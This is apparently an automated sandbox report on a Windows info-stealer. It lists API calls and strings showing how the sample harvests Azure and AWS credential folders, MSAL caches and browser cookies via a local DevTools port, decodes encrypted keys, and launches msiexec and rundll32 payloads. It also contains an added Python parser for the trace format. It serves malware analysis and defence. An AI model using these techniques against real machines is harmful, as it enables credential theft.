                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                                    • String ID: - $%s\%s$?
                                    • API String ID: 3246050789-3278919252
                                    • Opcode ID: f61b437e31cf100b08587835a4caee3d2ee6ba591458ffcd7a5465bfa63cb2db
                                    • Instruction ID: fdd4ee7a92b1161db71f983ccf59f530ae2fec230bad83548c9bee7595e27624
                                    • Opcode Fuzzy Hash: f61b437e31cf100b08587835a4caee3d2ee6ba591458ffcd7a5465bfa63cb2db
                                    • Instruction Fuzzy Hash: CF811871914218ABDB64DB94CD95FEAB7BDBB08300F1086D8E109A6580DF716B88CFE4
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006991FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: `diF$`diF$image/jpeg
                                    • API String ID: 2244384528-832773058
                                    • Opcode ID: f67e83db3b872083ca36432847c008a359cc203eab321785efde77a08e9031ad
                                    • Instruction ID: cb73d28e24ca90f0f6d27fb264b51e841ead372b611d41560270d37dc91646c3
                                    • Opcode Fuzzy Hash: f67e83db3b872083ca36432847c008a359cc203eab321785efde77a08e9031ad
                                    • Instruction Fuzzy Hash: B871ED71914208ABDF14EFE5EC89FEEB7BDBB48301F108508F516A7290DB34AA05DB61
                                    APIs
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00695000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 0069501D
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694B7C
                                      • Part of subcall function 00694B60: FindFirstFileA.KERNEL32(?,?), ref: 00694B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 0069508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 006950A9
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC4), ref: 00694BC1
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694BD7
                                      • Part of subcall function 00694B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00694DCD
                                      • Part of subcall function 00694B60: FindClose.KERNEL32(000000FF), ref: 00694DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00695118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00695135
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694C00
                                      • Part of subcall function 00694B60: StrCmpCA.SHLWAPI(?,006A08D3), ref: 00694C15
                                      • Part of subcall function 00694B60: wsprintfA.USER32 ref: 00694C32
                                      • Part of subcall function 00694B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00694C6E
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,0142E370), ref: 00694C9A
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,006A0FE0), ref: 00694CAC
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,?), ref: 00694CC0
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,006A0FE4), ref: 00694CD2
                                      • Part of subcall function 00694B60: lstrcat.KERNEL32(?,?), ref: 00694CE6
                                      • Part of subcall function 00694B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00694CFC
                                      • Part of subcall function 00694B60: DeleteFileA.KERNEL32(?), ref: 00694D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: e88630bf1affaf90e21acd3c2ed88a938e10f6bffceded28b0378caaa8628600
                                    • Instruction ID: 3a1aa0fbb309f08010cfa5b72cd106660b815551413ed9bae0534030f6503cd5
                                    • Opcode Fuzzy Hash: e88630bf1affaf90e21acd3c2ed88a938e10f6bffceded28b0378caaa8628600
                                    • Instruction Fuzzy Hash: 2F41B1BA94430867DF50F7B0EC47FED732E5B62701F004558B249664C1EEB4ABC88B96
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00693415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 006935AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0069373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 409a5508aa48e3564cdda0de73fd6649c0eb160d3ecac96f314e8eccb0510267
                                    • Instruction ID: a88e0ee07f2b1989d793366fd9787bbe3fd76d241be92217cc3cad257d0e416f
                                    • Opcode Fuzzy Hash: 409a5508aa48e3564cdda0de73fd6649c0eb160d3ecac96f314e8eccb0510267
                                    • Instruction Fuzzy Hash: 601209719101189ACF58EBE0DDA2FEDB7BEAF14300F00459DE50666596EF302B49CFA9
                                    APIs
                                      • Part of subcall function 00689A50: InternetOpenA.WININET(006A0AF6,00000001,00000000,00000000,00000000), ref: 00689A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00689CAF
                                    • lstrcat.KERNEL32(?,006A12C4), ref: 00689CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00689CD5
                                    • lstrcat.KERNEL32(?,006A12C8), ref: 00689CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00689CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00689D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00689D17
                                    • lstrlen.KERNEL32(00000000), ref: 00689D26
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: 1fbbe61d876fb385bdbb3dc57311813507057cf216be5031fdbb79b21dfe40a2
                                    • Instruction ID: 75040a731876749b1b1168ca3d2381776d517f5075f36c38255398d5c1483333
                                    • Opcode Fuzzy Hash: 1fbbe61d876fb385bdbb3dc57311813507057cf216be5031fdbb79b21dfe40a2
                                    • Instruction Fuzzy Hash: 7E514CB1914608ABCB14FBE0EC95FEEB739AF45301F404658F206A7191EB70AB49CF65
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 006862D0: InternetOpenA.WININET(006A0DFF,00000001,00000000,00000000,00000000), ref: 00686331
                                      • Part of subcall function 006862D0: StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686353
                                      • Part of subcall function 006862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686385
                                      • Part of subcall function 006862D0: HttpOpenRequestA.WININET(00000000,GET,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 006863D5
                                      • Part of subcall function 006862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0068640F
                                      • Part of subcall function 006862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00686421
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695568
                                    • lstrlen.KERNEL32(00000000), ref: 0069557F
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 006955B4
                                    • lstrlen.KERNEL32(00000000), ref: 006955D3
                                    • lstrlen.KERNEL32(00000000), ref: 006955FE
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 72b3dd9cd95fbe04af507d552c116443c3bb277753d5cd55b681b5470ab9c815
                                    • Instruction ID: 1adb8f981ec2b15f1c99c09d4baf5f1bdddf4f4669459059dde78e1ce55de9ea
                                    • Opcode Fuzzy Hash: 72b3dd9cd95fbe04af507d552c116443c3bb277753d5cd55b681b5470ab9c815
                                    • Instruction Fuzzy Hash: 7651E870914108ABCF54FFA0C9A6AFD77BEAF11341F504458E40A5B992EB306B05CBAA
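Added example (Python; not part of the Joe Sandbox report or of the sample): a parser for the API-trace line format used in these listings, with a decoder that turns the raw hex arguments the sandbox prints into their Windows SDK names. The input lines are copied from this page; the symbolic names and values come from the public SDK headers (wininet.h, shlobj.h, wincrypt.h, winreg.h, winnt.h), and only arguments whose meaning is fixed by the API prototype are decoded. Read this way, the WinINet sequence above is InternetOpenA with INTERNET_OPEN_TYPE_DIRECT, InternetConnectA for INTERNET_SERVICE_HTTP, HttpOpenRequestA with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, and InternetSetOptionA with option 31, INTERNET_OPTION_SECURITY_FLAGS, the option a client uses to set SECURITY_FLAG_IGNORE_* values (the value written is not shown in the trace).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Input: API-trace lines copied verbatim from the function listings in this report.
TRACE_LINES = """\
• Part of subcall function 006862D0: InternetOpenA.WININET(006A0DFF,00000001,00000000,00000000,00000000), ref: 00686331
• Part of subcall function 006862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686385
• Part of subcall function 006862D0: HttpOpenRequestA.WININET(00000000,GET,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 006863D5
• Part of subcall function 006862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0068640F
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695568
• Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
• Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
• Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
• Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A23F
• Part of subcall function 006812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
• InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00689AAB
• __aulldiv.LIBCMT ref: 00698302
""".splitlines()

# "<bullet> [Part of subcall function XXXXXXXX:] Api.MODULE(args), ref: XXXXXXXX"
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # int for hex words, None for '?', str for inline strings
    ref: int                        # address of the call site
    subcall: Optional[int] = None   # callee address when the line is "Part of subcall"
    decoded: Dict[int, str] = field(default_factory=dict)  # arg index -> symbolic value

def parse_arg(tok: str):
    t = tok.strip()
    if t == "?":
        return None
    m = re.fullmatch(r"(-?)([0-9A-Fa-f]{8})", t)
    if m:                            # 8 hex digits: the sandbox prints stack slots this way
        v = int(m.group(2), 16)
        return -v if m.group(1) else v
    return tok                       # inline string argument (GET, ERROR, a URL, ...)

def decode_bits(value: int, table: Dict[int, str]) -> str:
    """Expand a flag word into names; multi-bit entries (KEY_READ) must precede single bits."""
    names, rest = [], value
    for bit, name in table.items():
        if value & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"

INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x00800000: "INTERNET_FLAG_SECURE",
              0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
              0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00000200: "INTERNET_FLAG_NO_UI",
              0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}

# (API name, zero-based argument index) -> decoder; values taken from the Windows SDK headers.
DECODERS = {
    ("InternetOpenA", 1): lambda v: {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                                     3: "INTERNET_OPEN_TYPE_PROXY"}.get(v, hex(v)),
    ("InternetConnectA", 5): lambda v: {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}.get(v, hex(v)),
    ("HttpOpenRequestA", 6): lambda v: decode_bits(v, INET_FLAGS),
    ("InternetOpenUrlA", 4): lambda v: decode_bits(v, INET_FLAGS),
    ("InternetSetOptionA", 1): lambda v: {31: "INTERNET_OPTION_SECURITY_FLAGS"}.get(v, hex(v)),
    ("SHGetFolderPathA", 1): lambda v: {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
                                        0x1C: "CSIDL_LOCAL_APPDATA"}.get(v, hex(v)),
    ("CryptStringToBinaryA", 2): lambda v: decode_bits(v, {0x1: "CRYPT_STRING_BASE64"}),
    ("RegOpenKeyExA", 0): lambda v: {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}.get(v, hex(v)),
    ("RegOpenKeyExA", 3): lambda v: decode_bits(v, {0x20019: "KEY_READ", 0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY"}),
    ("CreateFileA", 1): lambda v: decode_bits(v, {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}),
    ("CreateFileA", 4): lambda v: {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}.get(v, hex(v)),
}

def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw is not None else []
    call = ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                   int(m.group("sub"), 16) if m.group("sub") else None)
    for idx, value in enumerate(args):
        dec = DECODERS.get((call.api, idx))
        if dec and isinstance(value, int) and value >= 0:
            call.decoded[idx] = dec(value)
    return call

def parse_trace(lines: List[str]) -> List[ApiCall]:
    return [c for c in map(parse_line, lines) if c is not None]

def find(calls: List[ApiCall], api: str) -> ApiCall:
    return next(c for c in calls if c.api == api)

if __name__ == "__main__":
    for c in parse_trace(TRACE_LINES):
        print(f"{c.ref:08X} {c.module}!{c.api} {c.decoded}")
```

Two caveats on the format itself: an inline string of exactly eight hex characters is indistinguishable from a stack word, and the argument count follows the sandbox's stack dump rather than the prototype (SHGetFolderPathA is shown with seven slots), so decoders are keyed by position only where the prototype fixes that position.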
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 9ba5dd94368efc23a571453f626136f6a40e9dbaaefe0f3303eb6877c06427c6
                                    • Instruction ID: 53fef5fb72c96845099990bcfd98176d94dde0773298e20f0fca17df5d6150fa
                                    • Opcode Fuzzy Hash: 9ba5dd94368efc23a571453f626136f6a40e9dbaaefe0f3303eb6877c06427c6
                                    • Instruction Fuzzy Hash: E2C1B3B59002099BCF54EFA0DC99FEE73BEAF54304F10459CF409A7641EA70AA85CFA4
                                    APIs
                                      • Part of subcall function 00698F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 0069453C
                                    • lstrcat.KERNEL32(?,0142DD70), ref: 0069455B
                                    • lstrcat.KERNEL32(?,?), ref: 0069456F
                                    • lstrcat.KERNEL32(?,0142C9E8), ref: 00694583
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00698F20: GetFileAttributesA.KERNEL32(00000000,?,00681B94,?,?,006A577C,?,?,006A0E22), ref: 00698F2F
                                      • Part of subcall function 0068A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0068A489
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00699550: GlobalAlloc.KERNEL32(00000000,0069462D,0069462D), ref: 00699563
                                    • StrStrA.SHLWAPI(?,0142DD40), ref: 00694643
                                    • GlobalFree.KERNEL32(?), ref: 00694762
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A23F
                                      • Part of subcall function 0068A210: LocalAlloc.KERNEL32(00000040,?,?,?,00684F3E,00000000,?), ref: 0068A251
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A27A
